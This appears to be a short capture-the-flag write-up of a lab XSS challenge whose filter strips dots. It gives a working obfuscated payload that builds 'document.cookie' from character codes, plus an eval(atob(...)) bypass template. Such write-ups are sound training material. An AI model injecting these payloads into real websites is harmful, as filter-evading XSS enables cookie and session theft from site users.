Generic character filter bypassing for XSS attacks

I was playing with Pentester Academy WAP Challenges, When I faced with Challenge 36 (XSS), I stuck with it. The game was so easy if it didn't want cookie value but just some alert message. I needed to use (.) operator for calling document.cookie in an alert function but in the backend, (.) dot characters were being filtered. So, after a little search in Google, I came up with this solutions.

<script>function write(str){ var s = /write/; var w = String(); var n = String(); w +=     s; w += s; n += w[1] + w[2] + w[3] + w[4] + w[5]; document[n](str); } var s = /fromCharCode/; var w = String(); var n = String(); w += s; n += w[1] + w[2] + w [3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + w[11] + w[12]; write(String [n] (60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109, 101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116, 62));</script>  

and ta-da!

We're generating the necessary vulnerable JavaScript code dynamically by using fromCharCode method on-the-fly with some magic.

Thanks for Pentester Academy for this great challenge.

PS: Sometimes, there is an easy way, too. Which is, doing a BASE64 encoding firstly and appliying an eval function onto it.

Example:

"><script>eval(atob('BASE64STRINGFORFILTEREDSTATEMENS'));</script>

Furkan ÇALIŞKAN

Read more posts by this author.